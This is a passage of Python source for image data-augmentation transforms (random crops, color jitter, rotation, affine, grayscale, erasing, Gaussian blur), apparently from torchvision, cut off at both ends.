\"\"\"Get parameters for ``crop`` for a random sized crop.\n\n Args:\n img (PIL Image or Tensor): Input image.\n scale (list): range of scale of the origin size cropped\n ratio (list): range of aspect ratio of the origin aspect ratio cropped\n\n Returns:\n tuple: params (i, j, h, w) to be passed to ``crop`` for a random\n sized crop.\n \"\"\"\n width, height = F._get_image_size(img)\n area = height * width\n\n for _ in range(10):\n target_area = area * torch.empty(1).uniform_(scale[0], scale[1]).item()\n log_ratio = torch.log(torch.tensor(ratio))\n aspect_ratio = torch.exp(\n torch.empty(1).uniform_(log_ratio[0], log_ratio[1])\n ).item()\n\n w = int(round(math.sqrt(target_area * aspect_ratio)))\n h = int(round(math.sqrt(target_area / aspect_ratio)))\n\n if 0 < w <= width and 0 < h <= height:\n i = torch.randint(0, height - h + 1, size=(1,)).item()\n j = torch.randint(0, width - w + 1, size=(1,)).item()\n return i, j, h, w\n\n # Fallback to central crop\n in_ratio = float(width) / float(height)\n if in_ratio < min(ratio):\n w = width\n h = int(round(w / min(ratio)))\n elif in_ratio > max(ratio):\n h = height\n w = int(round(h * max(ratio)))\n else: # whole image\n w = width\n h = height\n i = (height - h) // 2\n j = (width - w) // 2\n return i, j, h, w\n\n def forward(self, img):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be cropped and resized.\n\n Returns:\n PIL Image or Tensor: Randomly cropped and resized image.\n \"\"\"\n i, j, h, w = self.get_params(img, self.scale, self.ratio)\n return F.resized_crop(img, i, j, h, w, self.size, self.interpolation)\n\n def __repr__(self):\n interpolate_str = self.interpolation.value\n format_string = self.__class__.__name__ + 
'(size={0}'.format(self.size)\n format_string += ', scale={0}'.format(tuple(round(s, 4) for s in self.scale))\n format_string += ', ratio={0}'.format(tuple(round(r, 4) for r in self.ratio))\n format_string += ', interpolation={0})'.format(interpolate_str)\n return format_string\n\n\nclass RandomSizedCrop(RandomResizedCrop):\n \"\"\"\n Note: This transform is deprecated in favor of RandomResizedCrop.\n \"\"\"\n def __init__(self, *args, **kwargs):\n warnings.warn(\"The use of the transforms.RandomSizedCrop transform is deprecated, \" +\n \"please use transforms.RandomResizedCrop instead.\")\n super(RandomSizedCrop, self).__init__(*args, **kwargs)\n\n\nclass FiveCrop(torch.nn.Module):\n \"\"\"Crop the given image into four corners and the central crop.\n If the image is torch Tensor, it is expected\n to have [..., H, W] shape, where ... means an arbitrary number of leading\n dimensions\n\n .. Note::\n This transform returns a tuple of images and there may be a mismatch in the number of\n inputs and targets your Dataset returns. See below for an example of how to deal with\n this.\n\n Args:\n size (sequence or int): Desired output size of the crop. If size is an ``int``\n instead of sequence like (h, w), a square crop of size (size, size) is made.\n If provided a sequence of length 1, it will be interpreted as (size[0], size[0]).\n\n Example:\n >>> transform = Compose([\n >>> FiveCrop(size), # this is a list of PIL Images\n >>> Lambda(lambda crops: torch.stack([ToTensor()(crop) for crop in crops])) # returns a 4D tensor\n >>> ])\n >>> #In your test loop you can do the following:\n >>> input, target = batch # input is a 5d tensor, target is 2d\n >>> bs, ncrops, c, h, w = input.size()\n >>> result = model(input.view(-1, c, h, w)) # fuse batch size and ncrops\n >>> result_avg = result.view(bs, ncrops, -1).mean(1) # avg over crops\n \"\"\"\n\n def __init__(self, size):\n super().__init__()\n self.size = _setup_size(size, error_msg=\"Please provide only two dimensions (h, w) for size.\")\n\n def forward(self, img):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be cropped.\n\n Returns:\n tuple of 5 images. Image can be PIL Image or Tensor\n \"\"\"\n return F.five_crop(img, self.size)\n\n def __repr__(self):\n return self.__class__.__name__ + '(size={0})'.format(self.size)\n\n\nclass TenCrop(torch.nn.Module):\n \"\"\"Crop the given image into four corners and the central crop plus the flipped version of\n these (horizontal flipping is used by default).\n If the image is torch Tensor, it is expected\n to have [..., H, W] shape, where ... means an arbitrary number of leading\n dimensions\n\n .. Note::\n This transform returns a tuple of images and there may be a mismatch in the number of\n inputs and targets your Dataset returns. See below for an example of how to deal with\n this.\n\n Args:\n size (sequence or int): Desired output size of the crop. If size is an\n int instead of sequence like (h, w), a square crop (size, size) is\n made. 
If provided a sequence of length 1, it will be interpreted as (size[0], size[0]).\n vertical_flip (bool): Use vertical flipping instead of horizontal\n\n Example:\n >>> transform = Compose([\n >>> TenCrop(size), # this is a list of PIL Images\n >>> Lambda(lambda crops: torch.stack([ToTensor()(crop) for crop in crops])) # returns a 4D tensor\n >>> ])\n >>> #In your test loop you can do the following:\n >>> input, target = batch # input is a 5d tensor, target is 2d\n >>> bs, ncrops, c, h, w = input.size()\n >>> result = model(input.view(-1, c, h, w)) # fuse batch size and ncrops\n >>> result_avg = result.view(bs, ncrops, -1).mean(1) # avg over crops\n \"\"\"\n\n def __init__(self, size, vertical_flip=False):\n super().__init__()\n self.size = _setup_size(size, error_msg=\"Please provide only two dimensions (h, w) for size.\")\n self.vertical_flip = vertical_flip\n\n def forward(self, img):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be cropped.\n\n Returns:\n tuple of 10 images. Image can be PIL Image or Tensor\n \"\"\"\n return F.ten_crop(img, self.size, self.vertical_flip)\n\n def __repr__(self):\n return self.__class__.__name__ + '(size={0}, vertical_flip={1})'.format(self.size, self.vertical_flip)\n\n\nclass LinearTransformation(torch.nn.Module):\n \"\"\"Transform a tensor image with a square transformation matrix and a mean_vector computed\n offline.\n This transform does not support PIL Image.\n Given transformation_matrix and mean_vector, will flatten the torch.*Tensor and\n subtract mean_vector from it which is then followed by computing the dot\n product with the transformation matrix and then reshaping the tensor to its\n original shape.\n\n Applications:\n whitening transformation: Suppose X is a column vector zero-centered data.\n Then compute the data covariance matrix [D x D] with torch.mm(X.t(), X),\n perform SVD on this matrix and pass it as transformation_matrix.\n\n Args:\n transformation_matrix (Tensor): tensor [D x D], D = C x H x W\n mean_vector (Tensor): tensor [D], D = C x H x W\n \"\"\"\n\n def __init__(self, transformation_matrix, mean_vector):\n super().__init__()\n if transformation_matrix.size(0) != transformation_matrix.size(1):\n raise ValueError(\"transformation_matrix should be square. Got \" +\n \"[{} x {}] rectangular matrix.\".format(*transformation_matrix.size()))\n\n if mean_vector.size(0) != transformation_matrix.size(0):\n raise ValueError(\"mean_vector should have the same length {}\".format(mean_vector.size(0)) +\n \" as any one of the dimensions of the transformation_matrix [{}]\"\n .format(tuple(transformation_matrix.size())))\n\n if transformation_matrix.device != mean_vector.device:\n raise ValueError(\"Input tensors should be on the same device. 
Got {} and {}\"\n .format(transformation_matrix.device, mean_vector.device))\n\n self.transformation_matrix = transformation_matrix\n self.mean_vector = mean_vector\n\n def forward(self, tensor: Tensor) -> Tensor:\n \"\"\"\n Args:\n tensor (Tensor): Tensor image to be whitened.\n\n Returns:\n Tensor: Transformed image.\n \"\"\"\n shape = tensor.shape\n n = shape[-3] * shape[-2] * shape[-1]\n if n != self.transformation_matrix.shape[0]:\n raise ValueError(\"Input tensor and transformation matrix have incompatible shape.\" +\n \"[{} x {} x {}] != \".format(shape[-3], shape[-2], shape[-1]) +\n \"{}\".format(self.transformation_matrix.shape[0]))\n\n if tensor.device.type != self.mean_vector.device.type:\n raise ValueError(\"Input tensor should be on the same device as transformation matrix and mean vector. \"\n \"Got {} vs {}\".format(tensor.device, self.mean_vector.device))\n\n flat_tensor = tensor.view(-1, n) - self.mean_vector\n transformed_tensor = torch.mm(flat_tensor, self.transformation_matrix)\n tensor = transformed_tensor.view(shape)\n return tensor\n\n def __repr__(self):\n format_string = self.__class__.__name__ + '(transformation_matrix='\n format_string += (str(self.transformation_matrix.tolist()) + ')')\n format_string += (\", (mean_vector=\" + str(self.mean_vector.tolist()) + ')')\n return format_string\n\n\nclass ColorJitter(torch.nn.Module):\n \"\"\"Randomly change the brightness, contrast, saturation and hue of an image.\n If the image is torch Tensor, it is expected\n to have [..., 3, H, W] shape, where ... means an arbitrary number of leading dimensions.\n If img is PIL Image, mode \"1\", \"L\", \"I\", \"F\" and modes with transparency (alpha channel) are not supported.\n\n Args:\n brightness (float or tuple of float (min, max)): How much to jitter brightness.\n brightness_factor is chosen uniformly from [max(0, 1 - brightness), 1 + brightness]\n or the given [min, max]. Should be non negative numbers.\n contrast (float or tuple of float (min, max)): How much to jitter contrast.\n contrast_factor is chosen uniformly from [max(0, 1 - contrast), 1 + contrast]\n or the given [min, max]. Should be non negative numbers.\n saturation (float or tuple of float (min, max)): How much to jitter saturation.\n saturation_factor is chosen uniformly from [max(0, 1 - saturation), 1 + saturation]\n or the given [min, max]. 
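        An illustrative sketch (``img`` is assumed to be an existing 3-channel PIL Image or
        tensor image; the jitter ranges below are arbitrary examples):

            >>> jitter = ColorJitter(brightness=0.2, contrast=0.2, saturation=0.2, hue=0.05)
            >>> out = jitter(img)    # new jitter factors are re-sampled on every call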
Should be non negative numbers.\n hue (float or tuple of float (min, max)): How much to jitter hue.\n hue_factor is chosen uniformly from [-hue, hue] or the given [min, max].\n Should have 0<= hue <= 0.5 or -0.5 <= min <= max <= 0.5.\n \"\"\"\n\n def __init__(self, brightness=0, contrast=0, saturation=0, hue=0):\n super().__init__()\n self.brightness = self._check_input(brightness, 'brightness')\n self.contrast = self._check_input(contrast, 'contrast')\n self.saturation = self._check_input(saturation, 'saturation')\n self.hue = self._check_input(hue, 'hue', center=0, bound=(-0.5, 0.5),\n clip_first_on_zero=False)\n\n @torch.jit.unused\n def _check_input(self, value, name, center=1, bound=(0, float('inf')), clip_first_on_zero=True):\n if isinstance(value, numbers.Number):\n if value < 0:\n raise ValueError(\"If {} is a single number, it must be non negative.\".format(name))\n value = [center - float(value), center + float(value)]\n if clip_first_on_zero:\n value[0] = max(value[0], 0.0)\n elif isinstance(value, (tuple, list)) and len(value) == 2:\n if not bound[0] <= value[0] <= value[1] <= bound[1]:\n raise ValueError(\"{} values should be between {}\".format(name, bound))\n else:\n raise TypeError(\"{} should be a single number or a list/tuple with lenght 2.\".format(name))\n\n # if value is 0 or (1., 1.) for brightness/contrast/saturation\n # or (0., 0.) for hue, do nothing\n if value[0] == value[1] == center:\n value = None\n return value\n\n @staticmethod\n def get_params(brightness: Optional[List[float]],\n contrast: Optional[List[float]],\n saturation: Optional[List[float]],\n hue: Optional[List[float]]\n ) -> Tuple[Tensor, Optional[float], Optional[float], Optional[float], Optional[float]]:\n \"\"\"Get the parameters for the randomized transform to be applied on image.\n\n Args:\n brightness (tuple of float (min, max), optional): The range from which the brightness_factor is chosen\n uniformly. Pass None to turn off the transformation.\n contrast (tuple of float (min, max), optional): The range from which the contrast_factor is chosen\n uniformly. Pass None to turn off the transformation.\n saturation (tuple of float (min, max), optional): The range from which the saturation_factor is chosen\n uniformly. 
Pass None to turn off the transformation.\n hue (tuple of float (min, max), optional): The range from which the hue_factor is chosen uniformly.\n Pass None to turn off the transformation.\n\n Returns:\n tuple: The parameters used to apply the randomized transform\n along with their random order.\n \"\"\"\n fn_idx = torch.randperm(4)\n\n b = None if brightness is None else float(torch.empty(1).uniform_(brightness[0], brightness[1]))\n c = None if contrast is None else float(torch.empty(1).uniform_(contrast[0], contrast[1]))\n s = None if saturation is None else float(torch.empty(1).uniform_(saturation[0], saturation[1]))\n h = None if hue is None else float(torch.empty(1).uniform_(hue[0], hue[1]))\n\n return fn_idx, b, c, s, h\n\n def forward(self, img):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Input image.\n\n Returns:\n PIL Image or Tensor: Color jittered image.\n \"\"\"\n fn_idx, brightness_factor, contrast_factor, saturation_factor, hue_factor = \\\n self.get_params(self.brightness, self.contrast, self.saturation, self.hue)\n\n for fn_id in fn_idx:\n if fn_id == 0 and brightness_factor is not None:\n img = F.adjust_brightness(img, brightness_factor)\n elif fn_id == 1 and contrast_factor is not None:\n img = F.adjust_contrast(img, contrast_factor)\n elif fn_id == 2 and saturation_factor is not None:\n img = F.adjust_saturation(img, saturation_factor)\n elif fn_id == 3 and hue_factor is not None:\n img = F.adjust_hue(img, hue_factor)\n\n return img\n\n def __repr__(self):\n format_string = self.__class__.__name__ + '('\n format_string += 'brightness={0}'.format(self.brightness)\n format_string += ', contrast={0}'.format(self.contrast)\n format_string += ', saturation={0}'.format(self.saturation)\n format_string += ', hue={0})'.format(self.hue)\n return format_string\n\n\nclass RandomRotation(torch.nn.Module):\n \"\"\"Rotate the image by angle.\n If the image is torch Tensor, it is expected\n to have [..., H, W] shape, where ... means an arbitrary number of leading dimensions.\n\n Args:\n degrees (sequence or number): Range of degrees to select from.\n If degrees is a number instead of sequence like (min, max), the range of degrees\n will be (-degrees, +degrees).\n interpolation (InterpolationMode): Desired interpolation enum defined by\n :class:`torchvision.transforms.InterpolationMode`. Default is ``InterpolationMode.NEAREST``.\n If input is Tensor, only ``InterpolationMode.NEAREST``, ``InterpolationMode.BILINEAR`` are supported.\n For backward compatibility integer values (e.g. ``PIL.Image.NEAREST``) are still acceptable.\n expand (bool, optional): Optional expansion flag.\n If true, expands the output to make it large enough to hold the entire rotated image.\n If false or omitted, make the output image the same size as the input image.\n Note that the expand flag assumes rotation around the center and no translation.\n center (sequence, optional): Optional center of rotation, (x, y). Origin is the upper left corner.\n Default is the center of the image.\n fill (sequence or number, optional): Pixel fill value for the area outside the rotated\n image. If given a number, the value is used for all bands respectively.\n If input is PIL Image, the options is only available for ``Pillow>=5.2.0``.\n resample (int, optional): deprecated argument and will be removed since v0.10.0.\n Please use `arg`:interpolation: instead.\n\n .. 
_filters: https://pillow.readthedocs.io/en/latest/handbook/concepts.html#filters\n\n \"\"\"\n\n def __init__(\n self, degrees, interpolation=InterpolationMode.NEAREST, expand=False, center=None, fill=None, resample=None\n ):\n super().__init__()\n if resample is not None:\n warnings.warn(\n \"Argument resample is deprecated and will be removed since v0.10.0. Please, use interpolation instead\"\n )\n interpolation = _interpolation_modes_from_int(resample)\n\n # Backward compatibility with integer value\n if isinstance(interpolation, int):\n warnings.warn(\n \"Argument interpolation should be of type InterpolationMode instead of int. \"\n \"Please, use InterpolationMode enum.\"\n )\n interpolation = _interpolation_modes_from_int(interpolation)\n\n self.degrees = _setup_angle(degrees, name=\"degrees\", req_sizes=(2, ))\n\n if center is not None:\n _check_sequence_input(center, \"center\", req_sizes=(2, ))\n\n self.center = center\n\n self.resample = self.interpolation = interpolation\n self.expand = expand\n self.fill = fill\n\n @staticmethod\n def get_params(degrees: List[float]) -> float:\n \"\"\"Get parameters for ``rotate`` for a random rotation.\n\n Returns:\n float: angle parameter to be passed to ``rotate`` for random rotation.\n \"\"\"\n angle = float(torch.empty(1).uniform_(float(degrees[0]), float(degrees[1])).item())\n return angle\n\n def forward(self, img):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be rotated.\n\n Returns:\n PIL Image or Tensor: Rotated image.\n \"\"\"\n fill = self.fill\n if isinstance(img, Tensor):\n if isinstance(fill, (int, float)):\n fill = [float(fill)] * F._get_image_num_channels(img)\n else:\n fill = [float(f) for f in fill]\n angle = self.get_params(self.degrees)\n\n return F.rotate(img, angle, self.resample, self.expand, self.center, fill)\n\n def __repr__(self):\n interpolate_str = self.interpolation.value\n format_string = self.__class__.__name__ + '(degrees={0}'.format(self.degrees)\n format_string += ', interpolation={0}'.format(interpolate_str)\n format_string += ', expand={0}'.format(self.expand)\n if self.center is not None:\n format_string += ', center={0}'.format(self.center)\n if self.fill is not None:\n format_string += ', fill={0}'.format(self.fill)\n format_string += ')'\n return format_string\n\n\nclass RandomAffine(torch.nn.Module):\n \"\"\"Random affine transformation of the image keeping center invariant.\n If the image is torch Tensor, it is expected\n to have [..., H, W] shape, where ... means an arbitrary number of leading dimensions.\n\n Args:\n degrees (sequence or number): Range of degrees to select from.\n If degrees is a number instead of sequence like (min, max), the range of degrees\n will be (-degrees, +degrees). Set to 0 to deactivate rotations.\n translate (tuple, optional): tuple of maximum absolute fraction for horizontal\n and vertical translations. For example translate=(a, b), then horizontal shift\n is randomly sampled in the range -img_width * a < dx < img_width * a and vertical shift is\n randomly sampled in the range -img_height * b < dy < img_height * b. Will not translate by default.\n scale (tuple, optional): scaling factor interval, e.g (a, b), then scale is\n randomly sampled from the range a <= scale <= b. Will keep original scale by default.\n shear (sequence or number, optional): Range of degrees to select from.\n If shear is a number, a shear parallel to the x axis in the range (-shear, +shear)\n will be applied. 
Else if shear is a sequence of 2 values a shear parallel to the x axis in the\n range (shear[0], shear[1]) will be applied. Else if shear is a sequence of 4 values,\n a x-axis shear in (shear[0], shear[1]) and y-axis shear in (shear[2], shear[3]) will be applied.\n Will not apply shear by default.\n interpolation (InterpolationMode): Desired interpolation enum defined by\n :class:`torchvision.transforms.InterpolationMode`. Default is ``InterpolationMode.NEAREST``.\n If input is Tensor, only ``InterpolationMode.NEAREST``, ``InterpolationMode.BILINEAR`` are supported.\n For backward compatibility integer values (e.g. ``PIL.Image.NEAREST``) are still acceptable.\n fill (sequence or number, optional): Pixel fill value for the area outside the transformed\n image. If given a number, the value is used for all bands respectively.\n If input is PIL Image, the options is only available for ``Pillow>=5.0.0``.\n fillcolor (sequence or number, optional): deprecated argument and will be removed since v0.10.0.\n Please use `arg`:fill: instead.\n resample (int, optional): deprecated argument and will be removed since v0.10.0.\n Please use `arg`:interpolation: instead.\n\n .. _filters: https://pillow.readthedocs.io/en/latest/handbook/concepts.html#filters\n\n \"\"\"\n\n def __init__(\n self, degrees, translate=None, scale=None, shear=None, interpolation=InterpolationMode.NEAREST, fill=0,\n fillcolor=None, resample=None\n ):\n super().__init__()\n if resample is not None:\n warnings.warn(\n \"Argument resample is deprecated and will be removed since v0.10.0. Please, use interpolation instead\"\n )\n interpolation = _interpolation_modes_from_int(resample)\n\n # Backward compatibility with integer value\n if isinstance(interpolation, int):\n warnings.warn(\n \"Argument interpolation should be of type InterpolationMode instead of int. \"\n \"Please, use InterpolationMode enum.\"\n )\n interpolation = _interpolation_modes_from_int(interpolation)\n\n if fillcolor is not None:\n warnings.warn(\n \"Argument fillcolor is deprecated and will be removed since v0.10.0. 
Please, use fill instead\"\n )\n fill = fillcolor\n\n self.degrees = _setup_angle(degrees, name=\"degrees\", req_sizes=(2, ))\n\n if translate is not None:\n _check_sequence_input(translate, \"translate\", req_sizes=(2, ))\n for t in translate:\n if not (0.0 <= t <= 1.0):\n raise ValueError(\"translation values should be between 0 and 1\")\n self.translate = translate\n\n if scale is not None:\n _check_sequence_input(scale, \"scale\", req_sizes=(2, ))\n for s in scale:\n if s <= 0:\n raise ValueError(\"scale values should be positive\")\n self.scale = scale\n\n if shear is not None:\n self.shear = _setup_angle(shear, name=\"shear\", req_sizes=(2, 4))\n else:\n self.shear = shear\n\n self.resample = self.interpolation = interpolation\n self.fillcolor = self.fill = fill\n\n @staticmethod\n def get_params(\n degrees: List[float],\n translate: Optional[List[float]],\n scale_ranges: Optional[List[float]],\n shears: Optional[List[float]],\n img_size: List[int]\n ) -> Tuple[float, Tuple[int, int], float, Tuple[float, float]]:\n \"\"\"Get parameters for affine transformation\n\n Returns:\n params to be passed to the affine transformation\n \"\"\"\n angle = float(torch.empty(1).uniform_(float(degrees[0]), float(degrees[1])).item())\n if translate is not None:\n max_dx = float(translate[0] * img_size[0])\n max_dy = float(translate[1] * img_size[1])\n tx = int(round(torch.empty(1).uniform_(-max_dx, max_dx).item()))\n ty = int(round(torch.empty(1).uniform_(-max_dy, max_dy).item()))\n translations = (tx, ty)\n else:\n translations = (0, 0)\n\n if scale_ranges is not None:\n scale = float(torch.empty(1).uniform_(scale_ranges[0], scale_ranges[1]).item())\n else:\n scale = 1.0\n\n shear_x = shear_y = 0.0\n if shears is not None:\n shear_x = float(torch.empty(1).uniform_(shears[0], shears[1]).item())\n if len(shears) == 4:\n shear_y = float(torch.empty(1).uniform_(shears[2], shears[3]).item())\n\n shear = (shear_x, shear_y)\n\n return angle, translations, scale, shear\n\n def forward(self, img):\n \"\"\"\n img (PIL Image or Tensor): Image to be transformed.\n\n Returns:\n PIL Image or Tensor: Affine transformed image.\n \"\"\"\n fill = self.fill\n if isinstance(img, Tensor):\n if isinstance(fill, (int, float)):\n fill = [float(fill)] * F._get_image_num_channels(img)\n else:\n fill = [float(f) for f in fill]\n\n img_size = F._get_image_size(img)\n\n ret = self.get_params(self.degrees, self.translate, self.scale, self.shear, img_size)\n\n return F.affine(img, *ret, interpolation=self.interpolation, fill=fill)\n\n def __repr__(self):\n s = '{name}(degrees={degrees}'\n if self.translate is not None:\n s += ', translate={translate}'\n if self.scale is not None:\n s += ', scale={scale}'\n if self.shear is not None:\n s += ', shear={shear}'\n if self.interpolation != InterpolationMode.NEAREST:\n s += ', interpolation={interpolation}'\n if self.fill != 0:\n s += ', fill={fill}'\n s += ')'\n d = dict(self.__dict__)\n d['interpolation'] = self.interpolation.value\n return s.format(name=self.__class__.__name__, **d)\n\n\nclass Grayscale(torch.nn.Module):\n \"\"\"Convert image to grayscale.\n If the image is torch Tensor, it is expected\n to have [..., 3, H, W] shape, where ... 
means an arbitrary number of leading dimensions\n\n Args:\n num_output_channels (int): (1 or 3) number of channels desired for output image\n\n Returns:\n PIL Image: Grayscale version of the input.\n - If ``num_output_channels == 1`` : returned image is single channel\n - If ``num_output_channels == 3`` : returned image is 3 channel with r == g == b\n\n \"\"\"\n\n def __init__(self, num_output_channels=1):\n super().__init__()\n self.num_output_channels = num_output_channels\n\n def forward(self, img):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be converted to grayscale.\n\n Returns:\n PIL Image or Tensor: Grayscaled image.\n \"\"\"\n return F.rgb_to_grayscale(img, num_output_channels=self.num_output_channels)\n\n def __repr__(self):\n return self.__class__.__name__ + '(num_output_channels={0})'.format(self.num_output_channels)\n\n\nclass RandomGrayscale(torch.nn.Module):\n \"\"\"Randomly convert image to grayscale with a probability of p (default 0.1).\n If the image is torch Tensor, it is expected\n to have [..., 3, H, W] shape, where ... means an arbitrary number of leading dimensions\n\n Args:\n p (float): probability that image should be converted to grayscale.\n\n Returns:\n PIL Image or Tensor: Grayscale version of the input image with probability p and unchanged\n with probability (1-p).\n - If input image is 1 channel: grayscale version is 1 channel\n - If input image is 3 channel: grayscale version is 3 channel with r == g == b\n\n \"\"\"\n\n def __init__(self, p=0.1):\n super().__init__()\n self.p = p\n\n def forward(self, img):\n \"\"\"\n Args:\n img (PIL Image or Tensor): Image to be converted to grayscale.\n\n Returns:\n PIL Image or Tensor: Randomly grayscaled image.\n \"\"\"\n num_output_channels = F._get_image_num_channels(img)\n if torch.rand(1) < self.p:\n return F.rgb_to_grayscale(img, num_output_channels=num_output_channels)\n return img\n\n def __repr__(self):\n return self.__class__.__name__ + '(p={0})'.format(self.p)\n\n\nclass RandomErasing(torch.nn.Module):\n \"\"\" Randomly selects a rectangle region in an torch Tensor image and erases its pixels.\n This transform does not support PIL Image.\n 'Random Erasing Data Augmentation' by Zhong et al. See https://arxiv.org/abs/1708.04896\n\n Args:\n p: probability that the random erasing operation will be performed.\n scale: range of proportion of erased area against input image.\n ratio: range of aspect ratio of erased area.\n value: erasing value. Default is 0. If a single int, it is used to\n erase all pixels. If a tuple of length 3, it is used to erase\n R, G, B channels respectively.\n If a str of 'random', erasing each pixel with random values.\n inplace: boolean to make this transform inplace. 
Default set to False.\n\n Returns:\n Erased Image.\n\n Example:\n >>> transform = transforms.Compose([\n >>> transforms.RandomHorizontalFlip(),\n >>> transforms.ToTensor(),\n >>> transforms.Normalize((0.485, 0.456, 0.406), (0.229, 0.224, 0.225)),\n >>> transforms.RandomErasing(),\n >>> ])\n \"\"\"\n\n def __init__(self, p=0.5, scale=(0.02, 0.33), ratio=(0.3, 3.3), value=0, inplace=False):\n super().__init__()\n if not isinstance(value, (numbers.Number, str, tuple, list)):\n raise TypeError(\"Argument value should be either a number or str or a sequence\")\n if isinstance(value, str) and value != \"random\":\n raise ValueError(\"If value is str, it should be 'random'\")\n if not isinstance(scale, (tuple, list)):\n raise TypeError(\"Scale should be a sequence\")\n if not isinstance(ratio, (tuple, list)):\n raise TypeError(\"Ratio should be a sequence\")\n if (scale[0] > scale[1]) or (ratio[0] > ratio[1]):\n warnings.warn(\"Scale and ratio should be of kind (min, max)\")\n if scale[0] < 0 or scale[1] > 1:\n raise ValueError(\"Scale should be between 0 and 1\")\n if p < 0 or p > 1:\n raise ValueError(\"Random erasing probability should be between 0 and 1\")\n\n self.p = p\n self.scale = scale\n self.ratio = ratio\n self.value = value\n self.inplace = inplace\n\n @staticmethod\n def get_params(\n img: Tensor, scale: Tuple[float, float], ratio: Tuple[float, float], value: Optional[List[float]] = None\n ) -> Tuple[int, int, int, int, Tensor]:\n \"\"\"Get parameters for ``erase`` for a random erasing.\n\n Args:\n img (Tensor): Tensor image to be erased.\n scale (sequence): range of proportion of erased area against input image.\n ratio (sequence): range of aspect ratio of erased area.\n value (list, optional): erasing value. If None, it is interpreted as \"random\"\n (erasing each pixel with random values). If ``len(value)`` is 1, it is interpreted as a number,\n i.e. 
``value[0]``.\n\n Returns:\n tuple: params (i, j, h, w, v) to be passed to ``erase`` for random erasing.\n \"\"\"\n img_c, img_h, img_w = img.shape[-3], img.shape[-2], img.shape[-1]\n area = img_h * img_w\n\n for _ in range(10):\n erase_area = area * torch.empty(1).uniform_(scale[0], scale[1]).item()\n aspect_ratio = torch.empty(1).uniform_(ratio[0], ratio[1]).item()\n\n h = int(round(math.sqrt(erase_area * aspect_ratio)))\n w = int(round(math.sqrt(erase_area / aspect_ratio)))\n if not (h < img_h and w < img_w):\n continue\n\n if value is None:\n v = torch.empty([img_c, h, w], dtype=torch.float32).normal_()\n else:\n v = torch.tensor(value)[:, None, None]\n\n i = torch.randint(0, img_h - h + 1, size=(1, )).item()\n j = torch.randint(0, img_w - w + 1, size=(1, )).item()\n return i, j, h, w, v\n\n # Return original image\n return 0, 0, img_h, img_w, img\n\n def forward(self, img):\n \"\"\"\n Args:\n img (Tensor): Tensor image to be erased.\n\n Returns:\n img (Tensor): Erased Tensor image.\n \"\"\"\n if torch.rand(1) < self.p:\n\n # cast self.value to script acceptable type\n if isinstance(self.value, (int, float)):\n value = [self.value, ]\n elif isinstance(self.value, str):\n value = None\n elif isinstance(self.value, tuple):\n value = list(self.value)\n else:\n value = self.value\n\n if value is not None and not (len(value) in (1, img.shape[-3])):\n raise ValueError(\n \"If value is a sequence, it should have either a single value or \"\n \"{} (number of input channels)\".format(img.shape[-3])\n )\n\n x, y, h, w, v = self.get_params(img, scale=self.scale, ratio=self.ratio, value=value)\n return F.erase(img, x, y, h, w, v, self.inplace)\n return img\n\n\nclass GaussianBlur(torch.nn.Module):\n \"\"\"Blurs image with randomly chosen Gaussian blur.\n If the image is torch Tensor, it is expected\n to have [..., C, H, W] shape, where ... means an arbitrary number of leading dimensions.\n\n Args:\n kernel_size (int or sequence): Size of the Gaussian kernel.\n sigma (float or tuple of float (min, max)): Standard deviation to be used for\n creating kernel to perform blurring. If float, sigma is fixed. If it is tuple\n of float (min, max), sigma is chosen uniformly at random to lie in the\n given range.\n\n Returns:\n PIL Image or Tensor: Gaussian blurred version of the input image.\n\n \"\"\"\n\n def __init__(self, kernel_size, sigma=(0.1, 2.0)):\n super().__init__()\n self.kernel_size = _setup_size(kernel_size, \"Kernel size should be a tuple/list of two integers\")\n for ks in self.kernel_size:\n if ks <= 0 or ks % 2 == 0:\n raise ValueError(\"Kernel size value should be an odd and positive number.\")\n\n if isinstance(sigma, numbers.Number):\n if sigma <= 0:\n raise ValueError(\"If sigma is a single number, it must be positive.\")\n sigma = (sigma, sigma)\n elif isinstance(sigma, Sequence) and len(sigma) == 2:\n if not 0. 
< sigma[0] <= sigma[1]:\n raise ValueError(\"sigma values should be positive and of the form (min, max).\")\n else:\n raise ValueError(\"sigma should be a single number or a list/tuple with length 2.\")\n\n self.sigma = sigma\n\n @staticmethod\n def get_params(sigma_min: float, sigma_max: float) -> float:\n \"\"\"Choose sigma for random gaussian blurring.\n\n Args:\n sigma_min (float): Minimum standard deviation that can be chosen for blurring kernel.\n sigma_max (float): Maximum standard deviation that can be chosen for blurring kernel.\n\n Returns:\n float: Standard deviation to be passed to calculate kernel for gaussian blurring.\n \"\"\"\n return torch.empty(1).uniform_(sigma_min, sigma_max).item()\n\n def forward(self, img: Tensor) -> Tensor:\n \"\"\"\n Args:\n img (PIL Image or Tensor): image to be blurred.\n\n Returns:\n PIL Image or Tensor: Gaussian blurred image\n \"\"\"\n sigma = self.get_params(self.sigma[0], self.sigma[1])\n return F.gaussian_blur(img, self.kernel_size, [sigma, sigma])\n\n def __repr__(self):\n s = '(kernel_size={}, '.format(self.kernel_size)\n s += 'sigma={})'.format(self.sigma)\n return self.__class__.__name__ + s\n\n\ndef _setup_size(size, error_msg):\n if isinstance(size, numbers.Number):\n return int(size), int(size)\n\n if isinstance(size, Sequence) and len(size) == 1:\n return size[0], size[0]\n\n if len(size) != 2:\n raise ValueError(error_msg)\n\n return size\n\n\ndef _check_sequence_input(x, name, req_sizes):\n msg = req_sizes[0] if len(req_sizes) < 2 else \" or \".join([str(s) for s in req_sizes])\n if not isinstance(x, Sequence):\n raise TypeError(\"{} should be a sequence of length {}.\".format(name, msg))\n if len(x) not in req_sizes:\n raise ValueError(\"{} should be sequence of length {}.\".format(name, msg))\n\n\ndef _setup_angle(x, name, req_sizes=(2, )):\n if isinstance(x, numbers.Number):\n if x < 0:\n raise ValueError(\"If {} is a single number, it must be positive.\".format(name))\n x = [-x, x]\n else:\n _check_sequence_input(x, name, req_sizes)\n\n return [float(d) for d in x]\n\n\nclass RandomInvert(torch.nn.Module):\n \"\"\"Inverts the colors of the given image randomly with a given probability.\n If img is a Tensor, it is expected to be in [..., 1 or 3, H, W] format,\n where ... means it can have an arbitrary number of leading dimensions.\n If img is PIL Image, it is expected to be in mode \"L\" or \"RGB\".\n\n Args:\n p (float): probability of the image being color inverted. Default value is 0.5\n 